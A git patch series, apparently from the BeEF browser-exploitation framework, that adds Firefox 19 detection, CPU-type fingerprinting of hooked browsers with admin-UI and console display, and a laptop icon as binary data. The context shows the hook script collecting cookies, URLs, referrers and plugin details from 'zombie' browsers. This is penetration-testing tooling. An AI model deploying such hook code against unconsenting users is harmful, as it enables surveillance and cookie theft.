 		return !!window.devicePixelRatio && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/18\./) != null;
 	},
 
+	/**
+	 * Returns true if FF19
+	 * @example: beef.browser.isFF19()
+	 */
+    isFF19: function() {
+return !!window.devicePixelRatio && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/19\./) != null;
+	},
+
 	/**
 	 * Returns true if FF.
 	 * @example: beef.browser.isFF()
 	 */
 	isFF: function() {
-		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18();
+		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19();
 	},
 
 	/**
@@ -526,6 +534,7 @@ beef.browser = {
 			FF16:	this.isFF16(),	// Firefox 16
 			FF17:	this.isFF17(),	// Firefox 17
 			FF18:	this.isFF18(),	// Firefox 18
+			FF19:	this.isFF19(),	// Firefox 19
 			FF:	this.isFF(),	// Firefox any version
 
 			IE6:	this.isIE6(),	// Internet Explorer 6
@@ -597,6 +606,7 @@ beef.browser = {
 		if (this.isFF16())	{ return '16' };	// Firefox 16
 		if (this.isFF17())  { return '17' };    // Firefox 17
 		if (this.isFF18())  { return '18' };    // Firefox 18
+		if (this.isFF19())  { return '19' };    // Firefox 19
 
 		if (this.isIE6())	{ return '6'  };	// Internet Explorer 6
 		if (this.isIE7())	{ return '7'  };	// Internet Explorer 7
@@ -606,7 +616,7 @@ beef.browser = {
 
 		if (this.isS4())	{ return '4'  };	// Safari 4
 		if (this.isS5())	{ return '5'  };	// Safari 5
-		if (this.isS6())	{ return '6'  };	// Safari 5
+		if (this.isS6())	{ return '6'  };	// Safari 6
 
 		if (this.isO9_52())	{ return '9.5'};	// Opera 9.5x
 		if (this.isO9_60())	{ return '9.6'};	// Opera 9.6
@@ -630,7 +640,7 @@ beef.browser = {
 		if (this.isIE())	{ return 'IE'};		// Internet Explorer any version
 		if (this.isO())		{ return 'O' };		// Opera any version
 		if (this.isS())		{ return 'S' };		// Safari any version
-		return 'UN';					// Unknown UA
+		return 'UNKNOWN';					// Unknown UA
 	},
 
 	/**
@@ -957,15 +967,16 @@ beef.browser = {
 		var browser_version = beef.browser.getBrowserVersion();
 		var browser_reported_name = beef.browser.getBrowserReportedName();
 		var cookies = document.cookie;
-		var page_title = (document.title) ? document.title : "No Title";
+		var page_title = (document.title) ? document.title : "";
 		var page_uri = document.location.href;
-		var page_referrer = (document.referrer) ? document.referrer : "No Referrer";
+		var page_referrer = (document.referrer) ? document.referrer : "";
 		var hostname = document.location.hostname;
 		var hostport = (document.location.port)? document.location.port : "80";
 		var browser_plugins = beef.browser.getPlugins();
 		var date_stamp = new Date().toString();
 		var os_name = beef.os.getName();
 		var hw_name = beef.hardware.getName();
+		var cpu_type = beef.hardware.cpuType();
 		var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
 		var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;});
 		var screen_size = beef.browser.getScreenSize();
@@ -992,6 +1003,7 @@ beef.browser = {
 		if(browser_plugins) details["BrowserPlugins"] = browser_plugins;
 		if(os_name) details['OsName'] = os_name;
 		if(hw_name) details['Hardware'] = hw_name;
+		if(cpu_type) details['CPU'] = cpu_type;
 		if(date_stamp) details['DateStamp'] = date_stamp;
 		if(system_platform) details['SystemPlatform'] = system_platform;
 		if(browser_type) details['BrowserType'] = browser_type;
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index bed9b43c8..3ac0b3409 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -255,6 +255,14 @@ module BeEF
             self.err_msg "Invalid value for HasActiveX returned from the hook browser's initial connection."
           end
 
+          # get and store the value for CPU
+          cpu_type = get_param(@data['results'], 'CPU')
+          if !cpu_type.nil?
+            BD.set(session_id, 'CPU', cpu_type)
+          else
+            self.err_msg "Invalid value for CPU returned from the hook browser's initial connection."
+          end
+
           # get and store whether the browser has session cookies enabled
           has_session_cookies = get_param(@data['results'], 'hasSessionCookies')
           if BeEF::Filters.is_valid_yes_no?(has_session_cookies)
diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index e4857e87a..2a3daa27d 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -408,6 +408,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController
       summary_grid_hash['results'].push(page_name_row) # add the row
     end
 
+	# set and add the value for CPU
+	cpu_type = BD.get(zombie_session, 'CPU')
+	if not cpu_type.nil?
+	  encoded_cpu_type = CGI.escapeHTML(cpu_type)
+	  encoded_cpu_type_hash = { 'CPU' => encoded_cpu_type }
+
+	  page_name_row = {
+	    'category' => 'Host',
+	    'data' => encoded_cpu_type_hash,
+	    'from' => 'Initialization'
+	  }
+
+	  summary_grid_hash['results'].push(page_name_row) # add the row
+	end
+
     # set and add the return values for hasSessionCookies
     has_session_cookies = BD.get(zombie_session, 'hasSessionCookies')
     if not has_session_cookies.nil?
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index a13e74013..a84f7022a 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -617,6 +617,21 @@ class ShellInterface
       summary_grid_hash['results'].push(page_name_row) # add the row
     end
 
+    # set and add the value for CPU
+    cpu_type = BD.get(zombie_session, 'CPU')
+    if not cpu_type.nil?
+      encoded_cpu_type = CGI.escapeHTML(cpu_type)
+      encoded_cpu_type_hash = { 'CPU' => encoded_cpu_type }
+
+      page_name_row = {
+        'category' => 'Host',
+        'data' => encoded_cpu_type_hash,
+        'from' => 'Initialization'
+      }
+
+      summary_grid_hash['results'].push(page_name_row) # add the row
+    end
+
     # set and add the return values for hasSessionCookies
     has_session_cookies = BD.get(self.targetsession, 'hasSessionCookies')
     if not has_session_cookies.nil?

From cdc92f084efd4c49dc93b9bd8554c6c9cf32ac09 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 3 Feb 2013 03:41:29 +1030
Subject: [PATCH 184/397] Add laptop icon

---
 core/main/constants/hardware.rb                 |   1 +
 .../admin_ui/media/images/icons/laptop.png      | Bin 0 -> 57562 bytes
 2 files changed, 1 insertion(+)
 create mode 100644 extensions/admin_ui/media/images/icons/laptop.png

diff --git a/core/main/constants/hardware.rb b/core/main/constants/hardware.rb
index a74f9db96..1338cd726 100644
--- a/core/main/constants/hardware.rb
+++ b/core/main/constants/hardware.rb
@@ -13,6 +13,7 @@ module Constants
 
     HW_UNKNOWN_IMG        = 'pc.png'
 	HW_VM_IMG             = 'vm.png'
+	HW_LAPTOP_IMG         = 'laptop.png'
 	HW_IPHONE_UA_STR      = 'iPhone'
  	HW_IPHONE_IMG         = 'iphone.jpg'
 	HW_IPAD_UA_STR	      = 'iPad'
diff --git a/extensions/admin_ui/media/images/icons/laptop.png b/extensions/admin_ui/media/images/icons/laptop.png
new file mode 100644
index 0000000000000000000000000000000000000000..ef5a94354f88c54b9b241c09bf1edf86c419472d
GIT binary patch
literal 57562
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
